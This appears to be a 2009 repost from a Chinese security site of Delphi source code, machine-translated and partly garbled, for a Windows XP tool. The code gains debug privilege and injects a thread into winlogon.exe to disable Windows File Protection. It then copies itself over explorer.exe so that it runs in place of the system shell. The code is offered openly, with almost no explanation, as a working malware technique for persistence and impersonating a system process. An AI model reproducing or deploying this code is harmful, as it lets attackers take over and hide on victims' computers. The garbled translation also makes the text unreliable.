Turn off XP protection. Replace explorer. exe-vulnerability warning-the black bar safety net

ID MYHACK58:62200921987
Type myhack58
Reporter 佚名
Modified 2009-01-18T00:00:00


Author: open Source: open's blog

In the even of a VPC on the test. No more test. Even not call the dllcache directory. You like it


> {*********} { } { Turn off XP protection. 替换 explorer.exe } { } { Copyright (C) 2 0 0 8 bbs.secdst.net } { } {***********}

program Project1;

uses Windows,TlHelp32;

function LowerCase(const S: string): string; //turn lowercase var Ch: Char; L: Integer; Source, Dest: PChar; begin L := Length(S); SetLength(Result, L); Source := Pointer(S); Dest := Pointer(Result); while L <> 0 do begin Ch := Source^; if (Ch >= 'A') and (Ch <= 'Z') then Inc(Ch, 3 2); Dest^ := Ch; Inc(Source); Inc(Dest); Dec(L); end; end;

function CreatedMutexEx(MutexName: Pchar): Boolean; var MutexHandle: dword; begin MutexHandle := CreateMutex(nil, True, MutexName); if MutexHandle <> 0 then begin if GetLastError = ERROR_ALREADY_EXISTS then begin //CloseHandle(MutexHandle); Result := False; Exit; end; end; Result := True; end;

function GetWinPath: string; //get the WINDOWS directory var Buf: array[0..MAX_PATH] of char; begin GetWindowsDirectory(Buf, MAX_PATH); Result := Buf; if Result[Length(Result)]<>'\' then Result := Result + '\'; end;

function GetTempDirectory: string; //get the temporary directory var Buf: array[0..MAX_PATH] of char; begin GetTempPath(MAX_PATH,Buf); Result := Buf; if Result[Length(Result)]<>'\' then Result := Result + '\'; end;

function EnableDebugPriv : Boolean; //mention the right to DEBUG var hToken : THANDLE; tp : TTokenPrivileges; rl : Cardinal; begin result := false; OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES or TOKEN_QUERY, hToken); if LookupPrivilegeValue(nil, 'SeDebugPrivilege', tp. Privileges[0]. Luid) then begin tp. PrivilegeCount := 1; tp. Privileges[0]. Attributes := SE_PRIVILEGE_ENABLED; result := AdjustTokenPrivileges(hToken, False, tp, sizeof(tp), nil, rl); end; end;

procedure InjectThread(ProcessHandle: DWORD); //注入 winlogon.exe turn off XP File Protection var TID: LongWord; hSfc,hThread: HMODULE; pfnCloseEvents: Pointer; begin hSfc := LoadLibrary('sfc_os.dll'); pfnCloseEvents := GetProcAddress(hSfc,MAKEINTRESOURCE(2)); FreeLibrary(hSfc); hThread := CreateRemoteThread(ProcessHandle, nil, 0, pfnCloseEvents, nil, 0, TID); WaitForSingleObject(hThread, 4 0 0 0); end;

procedure InitProcess(Name: string); //find the winlogon. exe process PID var FSnapshotHandle: THandle; FProcessEntry32: TProcessEntry32; ProcessHandle:dword; begin FSnapshotHandle := CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0); FProcessEntry32. dwSize:=Sizeof(FProcessEntry32); if Process32First(FSnapshotHandle,FProcessEntry32) then begin repeat If Name = LowerCase(FProcessEntry32. szExeFile) then begin ProcessHandle := OpenProcess(PROCESS_ALL_ACCESS, False, FProcessEntry32. th32ProcessID); InjectThread(ProcessHandle); CloseHandle(ProcessHandle); Break; end; until not Process32Next(FSnapshotHandle,FProcessEntry32); end; CloseHandle(FSnapshotHandle); end;

const ExpFile = 'explorer.exe'; MasterMutex = 'OpenSoul';

var s: string; begin if not CreatedMutexEx(MasterMutex) then ExitProcess(0); //mutually split body if not EnableDebugPriv then Exit; //authentication failure quit InitProcess('winlogon.exe') ; //注入 winlogon.exe first turn off xp's File Protection . Prevention is System Restore s := ParamStr(0) ; //get the name if LowerCase(s) <> LowerCase(GetWinPath + ExpFile) then //判断 自己 是不是 系统 下 的 explorer.exe begin //if not MoveFileEx(PChar(GetWinPath + ExpFile),PChar(GetWinPath + 'system32\explorer.exe'),MOVEFILE_REPLACE_EXISTING); //先 移动 正在 运行 的 explorer.exe CopyFile(PChar(S),PChar(GetWinPath+ ExpFile),false) ; //put your own copy into the windows directory 为 explorer.exe end; WinExec(PChar(GetWinPath + 'system32\explorer.exe'),1); //运行 真正 的 explorer.exe end.